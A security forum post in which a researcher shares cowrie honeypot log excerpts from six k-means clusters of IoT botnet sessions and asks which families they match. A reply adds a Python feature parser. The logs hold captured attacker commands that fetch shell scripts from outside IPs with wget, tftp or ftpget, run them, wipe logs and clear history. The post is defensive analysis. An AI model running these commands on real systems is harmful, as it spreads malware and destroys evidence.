
SANS ISC: Need help with classifying botnets via log entries - Internet Security | DShield SANS ISC InfoSec Forums


Need help with classifying botnets via log entries
Hey there,

I wrote a program which successfully does k-means clustering with cowrie log entries from honeypots to assign attack cycles to one of 6 different clusters, so I can statistically analyze what type of bot is used by attackers. My problem is that I can't find much information about typical log entries from bots on the internet. Can one of you assign the following examples of each cluster to a common botnet (e.g. Mirai, Bashlite, etc.)?


#########
CLUSTER 0
#########
14 11 31.14.45.6 37045 2016-10-11T15:15:03+0000 New connection
14 11 31.14.45.6 37045 2016-10-11T15:15:04+0000 login attempt [root/root] succeeded
14 11 31.14.45.6 37045 2016-10-11T15:15:05+0000 Opening TTY Log: log/tty/20161011-151505-None-11i....
14 11 31.14.45.6 37045 2016-10-11T15:15:05+0000 Warning: state changed and new state returned
14 11 31.14.45.6 37045 2016-10-11T15:15:08+0000 CMD: enable
14 11 31.14.45.6 37045 2016-10-11T15:15:08+0000 Command not found: enable
14 11 31.14.45.6 37045 2016-10-11T15:15:08+0000 CMD: system
14 11 31.14.45.6 37045 2016-10-11T15:15:08+0000 Command not found: system
14 11 31.14.45.6 37045 2016-10-11T15:15:08+0000 CMD: shell
14 11 31.14.45.6 37045 2016-10-11T15:15:08+0000 Command not found: shell
14 11 31.14.45.6 37045 2016-10-11T15:15:08+0000 CMD: sh
14 11 31.14.45.6 37045 2016-10-11T15:15:08+0000 Command found: sh
14 11 31.14.45.6 37045 2016-10-11T15:15:08+0000 CMD: /bin/busybox ECCHI
14 11 31.14.45.6 37045 2016-10-11T15:15:08+0000 Command found: /bin/busybox ECCHI
14 11 31.14.45.6 37045 2016-10-11T15:15:08+0000 CMD: cat /proc/mounts; /bin/busybox ECCHI
14 11 31.14.45.6 37045 2016-10-11T15:15:08+0000 Command found: cat /proc/mounts
14 11 31.14.45.6 37045 2016-10-11T15:15:08+0000 Command found: /bin/busybox ECCHI
14 11 31.14.45.6 37045 2016-10-11T15:15:40+0000 Closing TTY Log: log/tty/20161011-151505-None-11i....
14 11 31.14.45.6 37045 2016-10-11T15:15:40+0000 Connection lost after 37 seconds


#########
CLUSTER 1
#########
21806 6035 113.23.72.170 60272 2016-10-20T00:45:11+0000 New connection
21806 6035 113.23.72.170 60272 2016-10-20T00:45:13+0000 login attempt [root/root] succeeded
21806 6035 113.23.72.170 60272 2016-10-20T00:45:13+0000 Opening TTY Log: log/tty/20161020-004513-None-6035...
21806 6035 113.23.72.170 60272 2016-10-20T00:45:13+0000 Warning: state changed and new state returned
21806 6035 113.23.72.170 60272 2016-10-20T00:45:15+0000 CMD: enable
21806 6035 113.23.72.170 60272 2016-10-20T00:45:15+0000 Command not found: enable
21806 6035 113.23.72.170 60272 2016-10-20T00:45:15+0000 CMD: system
21806 6035 113.23.72.170 60272 2016-10-20T00:45:15+0000 Command not found: system
21806 6035 113.23.72.170 60272 2016-10-20T00:45:15+0000 CMD: shell
21806 6035 113.23.72.170 60272 2016-10-20T00:45:15+0000 Command not found: shell
21806 6035 113.23.72.170 60272 2016-10-20T00:45:15+0000 CMD: sh
21806 6035 113.23.72.170 60272 2016-10-20T00:45:15+0000 Command found: sh
21806 6035 113.23.72.170 60272 2016-10-20T00:45:15+0000 CMD: /bin/busybox ECCHI
21806 6035 113.23.72.170 60272 2016-10-20T00:45:15+0000 Command found: /bin/busybox ECCHI
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 CMD: cat /proc/mounts; /bin/busybox ECCHI
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: cat /proc/mounts
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: /bin/busybox ECCHI
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 CMD: cd /dev && >.s || cd /var/tmp/ && >.s || cd /...
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: cd /dev
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: > .s
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: cd /var/tmp
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: > .s
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: cd /var/run
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: > .s
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: cd /var
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: > .s
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: cd /tmp
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: > .s
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: cd /home
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: > .s
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: cat /home/.s
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: cp /bin/echo /home/.s
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: /bin/busybox ECCHI
21806 6035 113.23.72.170 60272 2016-10-20T00:45:17+0000 CMD: /bin/busybox chmod 777 .s; /bin/busybox ECCHI
21806 6035 113.23.72.170 60272 2016-10-20T00:45:17+0000 Command found: /bin/busybox chmod 777 /home/.s
21806 6035 113.23.72.170 60272 2016-10-20T00:45:17+0000 Command found: chmod 777 /home/.s
21806 6035 113.23.72.170 60272 2016-10-20T00:45:17+0000 Command found: /bin/busybox ECCHI
21806 6035 113.23.72.170 60272 2016-10-20T00:45:18+0000 CMD: cat .s; /bin/busybox ECCHI
21806 6035 113.23.72.170 60272 2016-10-20T00:45:18+0000 Command found: cat /home/.s
21806 6035 113.23.72.170 60272 2016-10-20T00:45:18+0000 Command found: /bin/busybox ECCHI
21806 6035 113.23.72.170 60272 2016-10-20T00:45:19+0000 Closing TTY Log: log/tty/20161020-004513-None-6035...
21806 6035 113.23.72.170 60272 2016-10-20T00:45:19+0000 Connection lost after 8 seconds


#########
CLUSTER 2
#########
94 88 61.222.241.117 47743 2016-10-11T16:02:04+0000 New connection
94 88 61.222.241.117 47743 2016-10-11T16:02:14+0000 login attempt [root/root] succeeded
94 88 61.222.241.117 47743 2016-10-11T16:02:15+0000 Opening TTY Log: log/tty/20161011-160215-None-88i....
94 88 61.222.241.117 47743 2016-10-11T16:02:15+0000 Warning: state changed and new state returned
94 88 61.222.241.117 47743 2016-10-11T16:02:21+0000 CMD: sh || bash || shell
94 88 61.222.241.117 47743 2016-10-11T16:02:21+0000 Command found: sh
94 88 61.222.241.117 47743 2016-10-11T16:02:21+0000 Command found: bash
94 88 61.222.241.117 47743 2016-10-11T16:02:21+0000 Command not found: shell
94 88 61.222.241.117 47743 2016-10-11T16:02:23+0000 CMD: echo loldongs || busybox echo loldongs
94 88 61.222.241.117 47743 2016-10-11T16:02:23+0000 Command found: echo loldongs
94 88 61.222.241.117 47743 2016-10-11T16:02:23+0000 Command found: busybox echo loldongs
94 88 61.222.241.117 47743 2016-10-11T16:02:23+0000 Command found: echo loldongs
94 88 61.222.241.117 47743 2016-10-11T16:02:27+0000 CMD: cd /tmp || cd /var/run || cd /dev/shm || cd /...
94 88 61.222.241.117 47743 2016-10-11T16:02:27+0000 Command found: cd /tmp
94 88 61.222.241.117 47743 2016-10-11T16:02:27+0000 Command found: cd /var/run
94 88 61.222.241.117 47743 2016-10-11T16:02:27+0000 Command found: cd /dev/shm
94 88 61.222.241.117 47743 2016-10-11T16:02:27+0000 Command found: cd /mnt
94 88 61.222.241.117 47743 2016-10-11T16:02:27+0000 Command found: cd /var
94 88 61.222.241.117 47743 2016-10-11T16:02:27+0000 Command found: rm -f /var/log /var/run /var/mail /...
94 88 61.222.241.117 47743 2016-10-11T16:02:27+0000 Command found: busybox wget http://93.158.200.115/...
94 88 61.222.241.117 47743 2016-10-11T16:02:27+0000 Command found: wget http://93.158.200.115/one.sh
94 88 61.222.241.117 47743 2016-10-11T16:02:27+0000 Command found: wget http://93.158.200.115/one.sh
94 88 61.222.241.117 47743 2016-10-11T16:02:27+0000 Closing TTY Log: log/tty/20161011-160215-None-88i....
94 88 61.222.241.117 47743 2016-10-11T16:02:27+0000 Connection lost after 23 seconds


#########
CLUSTER 3
#########
3427 3267 85.105.155.21 40020 2016-10-12T21:37:33+0000 New connection
3427 3267 85.105.155.21 40020 2016-10-12T21:37:33+0000 login attempt [root/root] succeeded
3427 3267 85.105.155.21 40020 2016-10-12T21:37:34+0000 Opening TTY Log: log/tty/20161012-213734-None-3267...
3427 3267 85.105.155.21 40020 2016-10-12T21:37:34+0000 Warning: state changed and new state returned
3427 3267 85.105.155.21 40020 2016-10-12T21:37:34+0000 CMD: shell
3427 3267 85.105.155.21 40020 2016-10-12T21:37:34+0000 Command not found: shell
3427 3267 85.105.155.21 40020 2016-10-12T21:37:37+0000 CMD: sh
3427 3267 85.105.155.21 40020 2016-10-12T21:37:37+0000 Command found: sh
3427 3267 85.105.155.21 40020 2016-10-12T21:37:39+0000 CMD: free
3427 3267 85.105.155.21 40020 2016-10-12T21:37:39+0000 Command found: free
3427 3267 85.105.155.21 40020 2016-10-12T21:37:40+0000 CMD: mkdir -p /var/... && rm -f /var/.../*; ftpget...
3427 3267 85.105.155.21 40020 2016-10-12T21:37:40+0000 Command found: mkdir -p /var/...
3427 3267 85.105.155.21 40020 2016-10-12T21:37:40+0000 Command found: rm -f /var/.../*
3427 3267 85.105.155.21 40020 2016-10-12T21:37:40+0000 Command not found: ftpget -u ftp 164.132.237.180 /...
3427 3267 85.105.155.21 40020 2016-10-12T21:37:40+0000 Command found: wget -O /var/.../dn.sh http://164.1...
3427 3267 85.105.155.21 40020 2016-10-12T21:37:40+0000 Command not found: tftp -g -r dn.sh -l /var/.../dn...
3427 3267 85.105.155.21 40020 2016-10-12T21:37:40+0000 Command found: chmod +x /var/.../dn.sh
3427 3267 85.105.155.21 40020 2016-10-12T21:37:40+0000 Command found: sh /var/.../dn.sh &
3427 3267 85.105.155.21 40020 2016-10-12T21:37:40+0000 CMD: /etc/firewall_stop
3427 3267 85.105.155.21 40020 2016-10-12T21:37:40+0000 Command not found: /etc/firewall_stop
3427 3267 85.105.155.21 40020 2016-10-12T21:37:40+0000 Closing TTY Log: log/tty/20161012-213734-None-3267...
3427 3267 85.105.155.21 40020 2016-10-12T21:37:40+0000 Connection lost after 7 seconds


#########
CLUSTER 4
#########
4513 4310 46.172.91.20 47029 2016-10-13T04:59:41+0000 New connection
4513 4310 46.172.91.20 47029 2016-10-13T04:59:43+0000 login attempt [root/123456] succeeded
4513 4310 46.172.91.20 47029 2016-10-13T04:59:44+0000 Opening TTY Log: log/tty/20161013-045944-None-4310...
4513 4310 46.172.91.20 47029 2016-10-13T04:59:44+0000 Warning: state changed and new state returned
4513 4310 46.172.91.20 47029 2016-10-13T04:59:44+0000 CMD: sh
4513 4310 46.172.91.20 47029 2016-10-13T04:59:44+0000 Command found: sh
4513 4310 46.172.91.20 47029 2016-10-13T04:59:45+0000 CMD: mount
4513 4310 46.172.91.20 47029 2016-10-13T04:59:45+0000 Command found: mount
4513 4310 46.172.91.20 47029 2016-10-13T04:59:45+0000 Reading txtcmd from "txtcmds/bin/mount"
4513 4310 46.172.91.20 47029 2016-10-13T04:59:45+0000 CMD: cat /proc/cpuinfo
4513 4310 46.172.91.20 47029 2016-10-13T04:59:45+0000 Command found: cat /proc/cpuinfo
4513 4310 46.172.91.20 47029 2016-10-13T04:59:50+0000 Closing TTY Log: log/tty/20161013-045944-None-4310...
4513 4310 46.172.91.20 47029 2016-10-13T04:59:50+0000 Connection lost after 8 seconds


#########
CLUSTER 5
#########
3531 3363 124.107.59.21 35557 2016-10-12T22:58:26+0000 New connection
3531 3363 124.107.59.21 35557 2016-10-12T22:58:54+0000 login attempt [root/root] succeeded
3531 3363 124.107.59.21 35557 2016-10-12T22:58:54+0000 Opening TTY Log: log/tty/20161012-225854-None-3363...
3531 3363 124.107.59.21 35557 2016-10-12T22:58:54+0000 Warning: state changed and new state returned
3531 3363 124.107.59.21 35557 2016-10-12T22:59:16+0000 CMD: sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:16+0000 Command found: sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:20+0000 CMD: cd /tmp || cd /var/run || cd /mnt || cd /root...
3531 3363 124.107.59.21 35557 2016-10-12T22:59:20+0000 Command found: cd /tmp
3531 3363 124.107.59.21 35557 2016-10-12T22:59:20+0000 Command found: cd /var/run
3531 3363 124.107.59.21 35557 2016-10-12T22:59:20+0000 Command found: cd /mnt
3531 3363 124.107.59.21 35557 2016-10-12T22:59:20+0000 Command found: cd /root
3531 3363 124.107.59.21 35557 2016-10-12T22:59:20+0000 Command found: cd /
3531 3363 124.107.59.21 35557 2016-10-12T22:59:20+0000 Command found: wget http://45.32.194.93/bins.sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 CMD: cd /tmp || cd /var/run || cd /mnt || cd /root...
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command found: cd /tmp
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command found: cd /var/run
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command found: cd /mnt
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command found: cd /root
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command found: cd /
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command not found: wget http://45.32.194.93/bins.s...
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command not found: chmod 777 bins.sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command not found: sh bins.sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command not found: tftp 45.32.194.93 -c get tftp1....
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command not found: chmod 777 tftp1.sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command not found: sh tftp1.sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command not found: tftp -r tftp2.sh -g 45.32.194.9...
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command not found: chmod 777 tftp2.sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command not found: sh tftp2.sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command not found: ftpget -v -u anonymous -p anony...
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command not found: sh ftp1.sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command not found: rm -rf bins.sh tftp1.sh tftp2.s...
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command not found: rm -rf *
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command found: history -c
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 CMD: cd /tmp || cd /var/run || cd /mnt || cd /root...
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command found: cd /tmp
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command found: cd /var/run
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command found: cd /mnt
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command found: cd /root
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command found: cd /
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command not found: wget http://45.32.194.93/bins.s...
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command not found: chmod 777 bins.sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command not found: sh bins.sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command not found: tftp 45.32.194.93 -c get tftp1....
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command not found: chmod 777 tftp1.sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command not found: sh tftp1.sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command not found: tftp -r tftp2.sh -g 45.32.194.9...
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command not found: chmod 777 tftp2.sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command not found: sh tftp2.sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command not found: ftpget -v -u anonymous -p anony...
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command not found: sh ftp1.sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command not found: rm -rf bins.sh tftp1.sh tftp2.s...
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command not found: rm -rf *
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command found: history -c
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Closing TTY Log: log/tty/20161012-225854-None-3363...
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Connection lost after 66 seconds
Anonymous
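As an added example (not the poster's program), here is a parser for the cowrie text-log lines in the format shown above that turns one session into an explicit feature row: credentials, shell-name probes, the uppercase busybox marker token, downloader tools, drop directories and download hosts. Features are then comparable across clusters on named markers instead of raw strings; the busybox-token and shell-probe heuristics are my assumptions, and the sample session is constructed with documentation-range IPs.

```python
import re
# Cowrie text-log line as posted: "<seq> <session> <src_ip> <src_port> <ISO-8601 timestamp> <message>"
LINE_RE = re.compile(r"^\d+\s+(\d+)\s+(\d{1,3}(?:\.\d{1,3}){3})\s+\d+\s+(\S+)\s+(.*)$")
DOWNLOADERS = ("wget", "tftp", "ftpget")
SHELL_PROBES = ("enable", "system", "shell")   # fixed shell-name probing seen in clusters 0, 1 and 3

def session_features(lines):
    """Summarise one honeypot session as a flat dict usable as a clustering feature row.
    Commands come from the per-sub-command 'Command found/not found' lines, which are not truncated."""
    f = {"creds": None, "commands": [], "not_found": 0, "duration": None,
         "busybox_token": None, "probed_shells": [], "downloaders": [], "dirs": [], "hosts": []}
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m is None:                      # malformed or non-cowrie line: skip it
            continue
        msg = m.group(4)
        if msg.startswith("login attempt ["):
            f["creds"] = msg[len("login attempt ["):msg.index("]")]
        elif msg.startswith("Command found: "):
            f["commands"].append(msg[len("Command found: "):])
        elif msg.startswith("Command not found: "):
            f["commands"].append(msg[len("Command not found: "):])
            f["not_found"] += 1
        elif msg.startswith("Connection lost after "):
            f["duration"] = int(msg.split()[3])
    for cmd in f["commands"]:
        head, *rest = cmd.split() or [""]
        if head in SHELL_PROBES and head not in f["probed_shells"]:
            f["probed_shells"].append(head)
        if head in DOWNLOADERS and head not in f["downloaders"]:
            f["downloaders"].append(head)      # how the second stage is fetched
        if head == "cd" and rest and rest[0] not in f["dirs"]:
            f["dirs"].append(rest[0])          # candidate writable drop directories
        tok = re.match(r"(?:/bin/)?busybox\s+([A-Z]{3,})$", cmd)
        if tok:
            f["busybox_token"] = tok.group(1)  # assumed loader marker token, e.g. ECCHI
        for host in re.findall(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b", cmd):
            if host not in f["hosts"]:
                f["hosts"].append(host)        # download hosts named in commands
    return f

# Constructed sample session (documentation-range IPs), shaped like cluster 1 above.
SAMPLE_SESSION = """\
1 42 192.0.2.10 50000 2016-10-20T00:45:13+0000 login attempt [root/root] succeeded
2 42 192.0.2.10 50000 2016-10-20T00:45:15+0000 Command not found: enable
3 42 192.0.2.10 50000 2016-10-20T00:45:15+0000 Command found: /bin/busybox ECCHI
4 42 192.0.2.10 50000 2016-10-20T00:45:16+0000 Command found: cd /tmp
5 42 192.0.2.10 50000 2016-10-20T00:45:16+0000 Command found: wget http://198.51.100.7/bins.sh
6 42 192.0.2.10 50000 2016-10-20T00:45:19+0000 Connection lost after 8 seconds
""".splitlines()
```

Feeding each cluster's sessions through `session_features` and tabulating `busybox_token`, `probed_shells` and `downloaders` per cluster gives a compact fingerprint to compare against published descriptions of a family's loader, which is more reliable than matching on the raw CMD strings.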